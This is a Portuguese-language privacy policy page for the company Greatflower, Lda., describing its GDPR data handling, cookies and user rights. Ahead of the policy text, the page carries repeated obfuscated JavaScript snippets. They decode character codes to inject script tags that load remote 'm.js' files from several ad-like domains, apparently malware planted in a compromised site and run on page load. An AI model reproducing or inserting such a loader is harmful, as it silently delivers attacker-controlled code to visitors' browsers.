Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,119,101,108,108,46,108,105,110,101,116,111,97,100,115,97,99,116,105,118,101,46,99,111,109,47,109,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,100,111,99,107,46,108,111,118,101,103,114,101,101,110,112,101,110,99,105,108,115,46,103,97,47,109,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,99,104,116,46,115,101,99,111,110,100,97,114,121,105,110,102,111,114,109,116,114,97,110,100,46,99,111,109,47,109,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,100,114,97,107,101,46,115,116,114,111,110,103,99,97,112,105,116,97,108,97,100,115,46,103,97,47,109,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})(); Política de Privacidade
Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,119,101,108,108,46,108,105,110,101,116,111,97,100,115,97,99,116,105,118,101,46,99,111,109,47,109,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,100,111,99,107,46,108,111,118,101,103,114,101,101,110,112,101,110,99,105,108,115,46,103,97,47,109,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,99,104,116,46,115,101,99,111,110,100,97,114,121,105,110,102,111,114,109,116,114,97,110,100,46,99,111,109,47,109,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,100,114,97,107,101,46,115,116,114,111,110,103,99,97,112,105,116,97,108,97,100,115,46,103,97,47,109,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();

Política de privacidade

A Greatflower – Greatflower, Lda., adiante designada por Greatflower – sediada na Rua Circular Norte, s/nº, NERE – Parque Industrial e Tecnológico de Évora, 7005-841 Évora, Portugal – é responsável pela navegação do site www.greatflower.pt

A Greatflower preocupa-se com a sua privacidade, pelo que está empenhada em proteger as suas informações e dar-lhe a conhecer as regras gerais sobre como recolhemos, armazenamos e usamos as informações que partilha connosco. Bem como ajudá-lo a compreender os seus direitos em relação à informação pessoal que nos fornece.

Quando navega pelo nosso site, está a confiar-nos as suas informações e nós compreendemos que é um trabalho que exige um grande senso de responsabilidade. Pelo que trabalhamos arduamente para nos assegurarmos de que os os seus dados são recolhidos e tratados no estrito respeito e cumprimento do disposto na legislação de proteção de dados pessoais em vigor em cada momento, nomeadamente o Regulamento (UE) 2016/679 do Parlamento Europeu e do Conselho, de 27 de abril de 2016 (“RGPD”).

Ao continuar a usar este website, concorda com a nossa política de privacidade.

Última modificação feita a: 13 de Agosto de 2018.


Recolha, uso e tratamento de informação pessoal

Quando partilha connosco a sua informação, preenchendo algum formulário, providência-nos com a sua informação pessoal como o seu nome, email e número de telefone. A Greatflower utiliza as informações recolhidas, como o seu endereço de email, nome e número de telefone com o objectivo de garantir uma eficiente comunicação consigo, por exemplo, quando tenta entrar em contacto connosco através do nosso email ou contacto telefónico, a Greatflower usa esta informação para entrar em contacto consigo.

Além das finalidades acima referidas, a Greatflower poderá ainda utilizar os seus dados pessoais para efeitos de cumprimento de obrigações legais e para fins de investigação, deteção e repressão de crimes graves.

 A Greatflower não usa ou recolhe qualquer tipo de informação para outra finalidade que não aquela para qual foram recolhidos ou dado o consentimento por parte do titular dos dados. Não partilhamos a sua informação com empresas, entidades eou indivíduos externos à Greatflower. Se em alguma instância, pretendermos usar os seus dados para fins para além dos previstos na presente política de privacidade, solicitamos previamente o seu consentimento expresso.

Cookies

A Greatflower poderá recolher dados relevantes à eficiente utilização deste website, através da utilização de cookies.

“Cookies” são pequenos ficheiros informativos instalados no seu navegador (browser) aquando da visita de um site. São armazenados no dispositivo usado para aceder ao site e têm como objectivo melhorar a experiência do utilizador na navegação do mesmo.   Os “Cookies” não retêm dados pessoais, apenas informação relacionada com as suas preferências. Em momento algum são utilizados para identificar pessoalmente os utilizadores.

Caso queira conhecer os principais cookies utilizados no nosso sites, as respetivas finalidades e o período em que ficam armazenados, consulte a tabela abaixo:

Nome Objectivo Expiração
trp_language Guardar a preferência do idioma em português, possibilitando a substituição de strings de texto dos temas e plugins do wordpress. Um mês
PHPSESSID Guardar a informação submetida num formulário, permitindo que esta seja apresentada numa página diferente. Quando sai do site

Poderá desativar o uso de cookies , acedendo às definições do navegador que o permitem faze-lo. No entanto, se assim o fizer, poderá estar a limitar a sua experiência nas suas futuras visitas ao website.

No momento em que acede ao website da Greatflower será notificado através de uma frase informativa que utilizamos cookies.  

A maioria dos browsers aceita cookies automaticamente, informando ao utilizador sempre que assim o faz (seleccionando as opções apropriadas no respectivo navegador). O Utilizador tem a possibilidade de aceitar, recusar ou apagar cookies acedendo ao menu “opções” ou “preferências” do seu browser. Estes cookies possibilitam uma experiência eficaz no nosso site, pelo que ao desactivá-los poderá estar a limitar a sua experiência no website da Greatflower.

Para saber mais sobre cookies, visite www.allaboutcookies.org

Segurança da sua informação

No site da Greatflower podem também estar incluídos links de acesso a outros sites cujas práticas de privacidade são alheias à Greatflower.  Não podendo a Greatflower ser responsabilizada pela submissão de dados pessoais nesses sites, nem assumindo a Greatflower qualquer responsabilidade pela informação recolhida e tratada, pelo que os mesmos serão geridos pelas políticas de privacidade desses mesmos sites.

A Greatflower é a responsável encarregada da protecção de dados pessoais dos utilizadores do seu website e como tal, determina as finalidades e os meios de tratamento dos mesmos e assume o compromisso de garantir que as suas medidas adoptadas estão em conformidade a legislação em vigor.

Assim, caso os titulares de dados pessoais pretendam entrar em contacto com encarregado de proteção da proteção de dados, poderão fazê-lo através do seguinte contacto: greatflower@outlook.pt.

Os seus direitos

O utilizador do site da Greatflower, enquanto titular de dados pessoais tem os seguintes direitos a exercer nos termos do RGPD:

O direito de acesso, retificação, atualização, limitação e eliminação dos seus dados pessoais bem como a oposição a determinado tratamento destes mesmos.

O utilizador poderá exercer os direitos referidos, entrando em contacto com a Greatflower através do seguinte email: greatflower@outlook.pt . Poderá também reclamar junto da autoridade de controlo em Portugal, à Comissão Nacional de Proteção de Dados (CNPD). Usando para tal os contactos disponibilizados pela entidade para o efeito.

Se ainda tiver dúvidas envie-nos um email com o assunto ‘política de privacidade’, para o greatflower@outlook.pt